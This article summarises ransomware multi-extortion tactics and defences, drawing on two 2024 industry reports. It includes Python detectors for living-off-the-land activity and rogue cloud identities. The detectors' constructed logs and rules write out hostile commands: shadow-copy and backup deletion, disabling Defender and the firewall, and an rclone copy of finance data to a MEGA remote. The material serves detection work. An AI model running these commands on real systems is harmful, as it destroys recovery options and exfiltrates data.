Tactics Used by Ransomware Groups to Increase Extortion

The sources, the Microsoft Digital Defense Report 2024 and the Unit 42 2024 Incident Response Report, paint a clear picture: the methods attackers use are constantly evolving, demanding that organizations of all sizes and industries stay informed and adapt their security strategies accordingly. Attackers are becoming faster, more sophisticated, and relentless in their pursuit of valuable data. Understanding their tactics and the weaknesses they exploit is paramount to bolstering defenses and mitigating risk.
The sources highlight several strategies ransomware actors are employing to intensify their extortion efforts:
- Multi-Extortion Tactics: Ransomware groups have moved beyond simply encrypting data and demanding payment for decryption. They increasingly layer additional forms of pressure on top of encryption to push victims into paying.
  - Data Theft and Publication: Stealing sensitive data before encryption and threatening to publish it online has become common. Victims face a choice between paying the ransom and risking exposure of sensitive information, with the reputational damage and legal consequences that follow.
  - Harassment: Some groups harass the organization's employees, customers, or partners to increase pressure. They may contact individuals directly, disclose stolen data, or make threats, aiming to create public embarrassment or disrupt business operations.
  - SEC Disclosure Threats: A recently observed tactic exploits the SEC's cybersecurity disclosure rules, which require public companies to report a material incident on Form 8-K within four business days of determining that it is material. Attackers report, or threaten to report, their victims to the SEC for non-disclosure, regardless of whether a reportable breach actually occurred, adding regulatory scrutiny and potential penalties to the pressure. The victim must divert resources to responding to the SEC, which attackers expect to increase the likelihood of payment.
  - Targeting Sensitive Sectors: Attackers increasingly focus on organizations highly sensitive to service disruptions. The hospitality industry, for example, has become a prime target because any disruption to booking systems or guest services translates directly into financial loss and reputational damage.
- Sophisticated Social Engineering: Attackers are refining their social engineering techniques to gain initial access and bypass security measures.
  - IT Help Desk Scams: Impersonating a legitimate user and calling the help desk to reset a password or change the mobile number associated with an account (and with it the MFA or recovery factor) has become a highly effective tactic. Attackers exploit the helpful nature of help desk personnel, so identity verification for such requests needs to be stronger than the knowledge an attacker can buy or find.
  - Buying Access from Brokers: Ransomware groups readily purchase stolen credentials or access to already-compromised systems from initial access brokers, allowing them to skip the initial security layers and start from an established foothold within the target network.
- Exploiting Cloud Infrastructure: As organizations adopt cloud services, ransomware groups are adapting their tactics to cloud environments.
  - Leveraging Misconfigured Cloud Services: Attackers take advantage of misconfigured cloud accounts and services to gain access, create rogue accounts, and deploy their own malicious infrastructure inside the victim's cloud environment.
- Speed and Automation: Attackers are streamlining their operations to reduce the time between intrusion and extortion.
  - Rapid Data Exfiltration: Attackers prioritize fast data exfiltration to gain leverage quickly. In some cases, data is stolen within hours of initial access, leaving defenders little time to react before the extortion attempt begins.
  - Automation of Attack Stages: Vulnerability scanning, exploitation, and even data collection and exfiltration are being automated, allowing attackers to operate at scale and compromise multiple victims quickly.
- Adaptability and Innovation: Ransomware groups constantly refine their tactics to evade detection and counter evolving security measures.
  - Living Off the Land: Instead of relying solely on custom malware, attackers increasingly use legitimate tools already present in the victim's environment (built-in administration utilities, scripting engines, remote management software), so detection has to key on how a tool is used rather than on the tool itself.
  - Defense Evasion Techniques: Attackers are becoming more adept at evading security tools, disabling or bypassing defenses to remain undetected for longer.
  - Adding Attacker-Controlled Infrastructure: Some groups deploy their own infrastructure within the victim's environment, such as virtual machines or cloud workloads, to gain persistent access and further obscure their activities.
- Potential Use of AI in the Future: While not yet widely observed, the sources speculate that AI could further enhance ransomware attacks.
  - AI-Enabled Malware Development: Attackers could use AI to generate new malware variants or customize existing ones, making detection and analysis more difficult.
  - AI-Assisted Social Engineering: AI-powered chatbots could produce more convincing phishing emails or engage in real-time social engineering, potentially fooling even security-aware individuals.
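The living-off-the-land and defense-evasion tactics above are detectable even though the binaries are legitimate, because the command lines are distinctive and because the steps cluster in time. The following is an added example, not code from either report: it scores constructed process-creation events (the log lines are made up) against a small illustrative rule set mapped to ATT&CK techniques T1490 (Inhibit System Recovery), T1562.001 (Disable or Modify Tools) and T1567.002 (Exfiltration to Cloud Storage), and alerts on a host that shows two or more distinct techniques inside a 30-minute window. The rule list, host names, thresholds and window are assumptions chosen for illustration, not a complete signature set.

```python
"""Detect living-off-the-land commands that typically precede ransomware deployment.

Added example, not taken from either report. The events below are constructed, and
the rule set is illustrative rather than a complete signature library.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed process-creation events: (timestamp, host, parent image, command line).
SAMPLE_EVENTS = [
    ("2024-05-01T02:13:05Z", "fs01", "cmd.exe", r"vssadmin.exe delete shadows /all /quiet"),
    ("2024-05-01T02:13:07Z", "fs01", "cmd.exe", r"wbadmin delete catalog -quiet"),
    ("2024-05-01T02:13:09Z", "fs01", "cmd.exe", r"bcdedit /set {default} recoveryenabled no"),
    ("2024-05-01T02:13:12Z", "fs01", "powershell.exe",
     r"powershell -nop -w hidden Set-MpPreference -DisableRealtimeMonitoring $true"),
    ("2024-05-01T02:20:40Z", "fs01", "cmd.exe", r"rclone.exe copy D:\Finance mega:dump --transfers 32"),
    ("2024-05-01T08:45:00Z", "admin01", "cmd.exe", r"netsh advfirewall set allprofiles state off"),
    ("2024-05-01T09:02:11Z", "wks07", "explorer.exe", r"notepad.exe C:\Users\alice\notes.txt"),
    ("2024-05-01T09:10:00Z", "backup01", "services.exe", r"vssadmin list shadows"),
]

# (rule name, ATT&CK technique, pattern). Patterns are narrow on purpose so that routine
# administration such as "vssadmin list shadows" does not fire.
RULES = [
    ("shadow_copy_delete",    "T1490",     re.compile(r"\bvssadmin(\.exe)?\s+delete\s+shadows\b", re.I)),
    ("wmic_shadow_delete",    "T1490",     re.compile(r"\bwmic(\.exe)?\s+shadowcopy\s+delete\b", re.I)),
    ("backup_catalog_delete", "T1490",     re.compile(r"\bwbadmin(\.exe)?\s+delete\s+catalog\b", re.I)),
    ("recovery_disabled",     "T1490",     re.compile(r"\bbcdedit(\.exe)?\b.*\brecoveryenabled\s+no\b", re.I)),
    ("defender_realtime_off", "T1562.001", re.compile(r"Set-MpPreference\b.*-DisableRealtimeMonitoring\s+\$?true\b", re.I)),
    ("host_firewall_off",     "T1562.001", re.compile(r"\bnetsh(\.exe)?\s+advfirewall\s+set\s+\w+\s+state\s+off\b", re.I)),
    ("cloud_sync_tool",       "T1567.002", re.compile(r"\b(rclone|megasync|megacmd)(\.exe)?\b", re.I)),
]


def _parse_ts(ts):
    return datetime.fromisoformat(ts.replace("Z", "+00:00"))


def match_rules(cmdline):
    """Return [(rule name, technique)] for every rule whose pattern matches the command line."""
    return [(name, tech) for name, tech, pat in RULES if pat.search(cmdline)]


def score_hosts(events, window=timedelta(minutes=30), min_techniques=2):
    """Correlate rule hits per host. A host is alerted when hits covering at least
    `min_techniques` distinct ATT&CK techniques fall inside one `window`; a lone hit
    (e.g. an administrator turning the firewall off once) is left for triage."""
    hits = defaultdict(list)
    for ts, host, _parent, cmdline in events:
        for name, tech in match_rules(cmdline):
            hits[host].append((_parse_ts(ts), name, tech, cmdline))

    alerts = {}
    for host, rows in hits.items():
        rows.sort(key=lambda r: r[0])
        for i, (start, _name, _tech, _cmd) in enumerate(rows):
            in_window = [r for r in rows[i:] if r[0] - start <= window]
            techniques = {r[2] for r in in_window}
            if len(techniques) >= min_techniques:
                alerts[host] = {
                    "first_seen": start.isoformat(),
                    "techniques": sorted(techniques),
                    "rules": [r[1] for r in in_window],
                    "commands": [r[3] for r in in_window],
                }
                break
    return alerts


if __name__ == "__main__":
    for host, alert in score_hosts(SAMPLE_EVENTS).items():
        print(f"ALERT {host}: {alert['techniques']} starting {alert['first_seen']}")
        for cmd in alert["commands"]:
            print("   ", cmd)
```

On the constructed data only `fs01` is alerted: it deletes shadow copies and the backup catalog, disables recovery and Defender real-time protection, and then runs rclone against a cloud bucket within eight minutes. `admin01` matches one rule but stays below the two-technique threshold, and the `vssadmin list shadows` on `backup01` does not match at all, which is the point of keeping the patterns narrow.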
The sources provide a glimpse into the evolving landscape of ransomware extortion tactics. By understanding these strategies and adapting their security practices, organizations can better protect themselves from these evolving threats.
Strategies to Reduce the Risk of Ransomware Attacks
The sources offer several key strategies organizations should implement to reduce the risk of ransomware attacks:
- Prioritize Identity Security: The sources repeatedly emphasize protecting identities as the foundation of any cybersecurity strategy, especially against ransomware. "[A]ttackers don't break in, they log in," meaning credentials are the primary target. Strong identity security measures significantly reduce risk exposure.
- Adopt Multi-Factor Authentication (MFA) Everywhere: The sources strongly advise implementing MFA across all systems and applications. Prefer phishing-resistant methods (FIDO2/WebAuthn security keys and passkeys, or certificate-based authentication) wherever possible. Push notifications and one-time codes from authenticator apps still raise the bar considerably, but they can be relayed through a real-time phishing proxy or worn down by push fatigue, so treat them as a floor rather than the goal.
- Implement Zero Trust Architecture: The sources recommend adopting a Zero Trust approach to network security. Zero Trust eliminates implicit trust, continuously validating every digital interaction. Key aspects include:
  - Strong authentication methods
  - Network segmentation to limit attackers' lateral movement
  - Least privilege access to minimize the impact of compromised accounts
- Enhance Endpoint Security: The sources highlight the importance of robust endpoint protection to prevent and contain ransomware attacks. Key measures include:
  - Deploying endpoint detection and response (EDR) solutions on all desktops and servers, with a dedicated security operations team to monitor and respond to alerts
  - Ensuring consistent coverage of security controls across the entire network, since unmonitored hosts are where attackers stage tooling and evade detection
  - Restricting and closely monitoring remote access, particularly Remote Desktop Protocol (RDP): keep RDP off the internet, allowlist a small set of approved remote management tools and alert on any others, and require MFA for all remote access
- Maintain a Robust Patch Management Process: Unpatched vulnerabilities are a major entry point for ransomware attacks. Organizations should:
  - Proactively identify and patch vulnerabilities on all internet-facing systems, applying security updates promptly and on a regular cadence
  - Implement attack surface management (ASM) tools to continuously monitor for vulnerabilities and exposures. Both external and internal ASM are necessary to reduce the overall attack surface.
- Develop a Comprehensive Incident Response Plan: The sources stress the importance of having a well-defined incident response plan to deal with ransomware attacks effectively. Key elements include:
  - Clearly defined roles, procedures, and timelines
  - Regularly testing and updating the plan, ideally with input from cybersecurity experts
  - Preparing for rapid containment, including procedures for credential resets and session revocation covering user, service, and privileged accounts
  - Establishing out-of-band communication systems so the response team can still coordinate when email and chat are encrypted or being read by the attacker
- Leverage AI and Automation: The sources suggest that AI and automation can be powerful tools in defending against ransomware, helping organizations to:
  - Improve threat detection and response times. AI-powered tools can sift through large amounts of data to identify anomalies and prioritize alerts.
  - Automate routine security tasks, such as vulnerability scanning and patch management, freeing up security personnel for more complex tasks.
- Secure Cloud Infrastructure: Organizations are increasingly moving workloads to the cloud, making cloud security essential. Key measures include:
  - Implementing a robust cloud security program and platform that provides comprehensive, cloud-native security features
  - Addressing cloud-specific security risks, such as misconfigurations, weak authentication, and excessive permissions.
- Educate Users and Build a Strong Security Culture: Human error remains a significant factor in ransomware attacks. Organizations should:
  - Provide regular security awareness training to all employees, covering phishing, social engineering, password hygiene, and safe browsing practices.
  - Foster a security-conscious culture in which employees understand their role in cybersecurity and feel empowered to report suspicious activity.
- Seek Expert Assistance: The sources recommend engaging incident response experts to assist with:
  - Negotiating with threat actors if payment is deemed necessary. Experts can help avoid missteps and advise on legal and technical challenges, including sanctions exposure: a payment to a sanctioned actor can itself be unlawful, so sanctions screening belongs in the decision.
  - Conducting proactive assessments to evaluate the organization's security posture, such as ransomware readiness assessments and tabletop exercises.
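The cloud guidance above, and the tactic in the earlier list of creating rogue accounts and attacker-controlled workloads inside the victim's cloud environment, both come down to watching the control plane. As an added example, not drawn from either report, the following Python reads constructed CloudTrail-style events (the account number, user names, IP addresses and event details are all made up) and flags a console login without MFA, identity changes by principals outside an assumed approved-admin set or from outside assumed trusted networks, attachment of the AdministratorAccess policy, and compute launched by an identity that was created in the same log shortly before. The field names follow CloudTrail's shape; the approved-admin set, trusted networks and 24-hour "new identity" window are assumptions for illustration.

```python
"""Flag control-plane activity consistent with rogue identities and attacker-run
workloads in a cloud account.

Added example, not taken from either report. The events, account number, user names,
IP addresses, approved-admin set and trusted networks are all constructed.
"""
import ipaddress
from datetime import datetime, timedelta

ACCOUNT = "123456789012"                                                   # constructed
APPROVED_IDENTITY_ADMINS = {f"arn:aws:iam::{ACCOUNT}:user/iam-admin-alice"}  # assumed
TRUSTED_NETWORKS = ["198.51.100.0/24"]                                     # assumed corporate egress

IDENTITY_EVENTS = {"CreateUser", "CreateLoginProfile", "CreateAccessKey", "AttachUserPolicy",
                   "PutUserPolicy", "AttachRolePolicy", "UpdateAssumeRolePolicy"}
COMPUTE_EVENTS = {"RunInstances", "CreateKeyPair", "AuthorizeSecurityGroupIngress"}


def _ev(time, name, source, actor, ip, **extra):
    """Build a minimal CloudTrail-shaped record with only the fields the rules read."""
    rec = {"eventTime": time, "eventName": name, "eventSource": source,
           "userIdentity": {"arn": actor}, "sourceIPAddress": ip}
    rec.update(extra)
    return rec


SVC = f"arn:aws:iam::{ACCOUNT}:user/devops-svc"
ROGUE = f"arn:aws:iam::{ACCOUNT}:user/backup-sync"
ALICE = f"arn:aws:iam::{ACCOUNT}:user/iam-admin-alice"
CI = f"arn:aws:sts::{ACCOUNT}:assumed-role/ci-deployer/build-42"

SAMPLE_LOG = [  # constructed: a stolen service-account credential builds a rogue admin and launches VMs
    _ev("2024-05-01T02:05:10Z", "ConsoleLogin", "signin.amazonaws.com", SVC, "203.0.113.77",
        additionalEventData={"MFAUsed": "No"}),
    _ev("2024-05-01T02:06:30Z", "CreateUser", "iam.amazonaws.com", SVC, "203.0.113.77",
        requestParameters={"userName": "backup-sync"}),
    _ev("2024-05-01T02:07:02Z", "AttachUserPolicy", "iam.amazonaws.com", SVC, "203.0.113.77",
        requestParameters={"userName": "backup-sync",
                           "policyArn": "arn:aws:iam::aws:policy/AdministratorAccess"}),
    _ev("2024-05-01T02:07:40Z", "CreateAccessKey", "iam.amazonaws.com", SVC, "203.0.113.77",
        requestParameters={"userName": "backup-sync"}),
    _ev("2024-05-01T02:31:00Z", "RunInstances", "ec2.amazonaws.com", ROGUE, "203.0.113.77",
        requestParameters={"instanceType": "c5.4xlarge"}),
    # benign: an approved admin onboarding a user from the corporate network, with MFA
    _ev("2024-05-01T09:00:00Z", "ConsoleLogin", "signin.amazonaws.com", ALICE, "198.51.100.10",
        additionalEventData={"MFAUsed": "Yes"}),
    _ev("2024-05-01T09:02:15Z", "CreateUser", "iam.amazonaws.com", ALICE, "198.51.100.10",
        requestParameters={"userName": "new-hire-bob"}),
    # benign: the CI role launching build capacity
    _ev("2024-05-01T09:30:00Z", "RunInstances", "ec2.amazonaws.com", CI, "198.51.100.20"),
]


def _ts(ev):
    return datetime.fromisoformat(ev["eventTime"].replace("Z", "+00:00"))


def analyze(events, approved_admins=APPROVED_IDENTITY_ADMINS,
            trusted_networks=TRUSTED_NETWORKS, new_identity_window=timedelta(hours=24)):
    """Return a list of findings, each {time, principal, event, reason}."""
    nets = [ipaddress.ip_network(n) for n in trusted_networks]
    created = {}   # IAM user name -> time it was created within this log
    findings = []

    def flag(ev, reason):
        findings.append({"time": ev["eventTime"], "principal": ev["userIdentity"]["arn"],
                         "event": ev["eventName"], "reason": reason})

    for ev in sorted(events, key=_ts):
        name, actor = ev["eventName"], ev["userIdentity"]["arn"]
        params = ev.get("requestParameters") or {}
        from_trusted = any(ipaddress.ip_address(ev["sourceIPAddress"]) in n for n in nets)

        if name == "ConsoleLogin" and ev.get("additionalEventData", {}).get("MFAUsed") != "Yes":
            flag(ev, "console login without MFA")

        if name in IDENTITY_EVENTS:
            if actor not in approved_admins:
                flag(ev, "identity change by a principal outside the approved admin set")
            if not from_trusted:
                flag(ev, "identity change from an untrusted network")
            if params.get("policyArn", "").endswith("/AdministratorAccess"):
                flag(ev, f"AdministratorAccess attached to {params.get('userName') or params.get('roleName')}")
            if name == "CreateUser":
                created[params["userName"]] = _ts(ev)

        # A brand-new user that immediately launches compute is the attacker-controlled
        # infrastructure pattern, whoever created it.
        actor_user = actor.rsplit(":user/", 1)[1] if ":user/" in actor else None
        if name in COMPUTE_EVENTS and actor_user in created:
            age = _ts(ev) - created[actor_user]
            if age <= new_identity_window:
                flag(ev, f"compute provisioned by an identity created {int(age.total_seconds() // 60)} minutes earlier")
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f"{f['time']} {f['event']:<18} {f['principal'].rsplit(':', 1)[1]:<28} {f['reason']}")
```

Every finding on the constructed log lands on `devops-svc` or the `backup-sync` user it created; the approved administrator's MFA-backed onboarding from the corporate range and the CI role's instance launch produce nothing. In production the approved-admin set and trusted networks would come from your IAM baseline rather than constants, and the "new identity" rule should also consult an identity inventory so that a user created before the log window is not missed.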
The sources provide a comprehensive overview of ransomware threats and mitigation strategies. While the complexity and sophistication of attacks are increasing, the sources offer a hopeful perspective. By implementing these strategies and continuously adapting to the evolving threat landscape, organizations can significantly reduce their risk of falling victim to ransomware attacks.
Tactics Used in Multi-Extortion
The sources highlight that threat actors are increasingly employing multi-extortion tactics to increase pressure on victims to pay ransoms. Multi-extortion goes beyond simply encrypting data and demanding payment for its release. Instead, attackers layer on additional threats and actions to maximize their leverage and profits.
Here are some key tactics used in multi-extortion, as detailed in the sources:
- Data Theft and Public Disclosure: In addition to encrypting data, attackers often steal sensitive information before deploying ransomware. They then threaten to publicly release this data, often on dark web leak sites, if the ransom is not paid. This tactic adds an extra layer of pressure, as organizations face potential reputational damage, regulatory fines, and legal action if their data is exposed. The Unit 42 2024 Incident Response Report notes a 49% increase in postings on dark web leak sites from 2022 to 2023, highlighting the growing prevalence of this tactic.
- Harassment of Employees and Customers: Some threat actors resort to harassing an organization's employees or customers to further incentivize ransom payment. This can involve contacting individuals via email, phone, or social media, threatening to release their personal data or disrupt their lives if the organization does not comply with the ransom demands. While less common than data theft, the use of harassment in extortion cases where payment was made has significantly increased from less than 1% in 2021 to 27% in 2023.
- DDoS Attacks: Distributed denial of service (DDoS) attacks can be used as an additional extortion tactic, overwhelming an organization's online services with traffic to disrupt operations and pressure them into paying the ransom. The Microsoft Digital Defense Report 2024 highlights a fourfold increase in DDoS attacks mitigated in the second half of 2023 compared to the previous year.
- Exploitation of SEC Disclosure Rules: Recent reports suggest that threat actors are leveraging the US Securities and Exchange Commission (SEC) disclosure rules for extortion. Public companies must disclose a material cybersecurity incident on Form 8-K within four business days of determining that it is material; attackers report, or threaten to report, their victim to the SEC for failing to do so, regardless of whether a reportable breach actually occurred. This tactic exploits the regulatory burden and reputational damage that come with SEC scrutiny, adding another layer of pressure on organizations to comply with ransom demands.
Effectiveness of Multi-Extortion Tactics
The sources suggest that multi-extortion tactics are proving effective for attackers. While the overall prevalence of different extortion tactics has remained relatively stable, the use of additional tactics like data theft and harassment has significantly increased in cases where victims ultimately paid the ransom. This indicates that these layered threats are successfully pushing more organizations to make payments.
The Evolving Landscape of Extortion
The sources emphasize that the extortion landscape is continually evolving, with attackers constantly adapting their techniques and finding new ways to exert pressure on victims. As organizations implement stronger security measures like multifactor authentication and data backups, threat actors find new ways around them: reliable backups blunt the encryption threat, which is precisely why leverage has shifted to stolen data and to pressure on employees, customers and regulators. The emergence of techniques like exploiting SEC disclosure rules and the increasing sophistication of data theft and harassment campaigns demonstrate the ongoing need for organizations to maintain vigilance and adapt their security strategies to counter these evolving threats.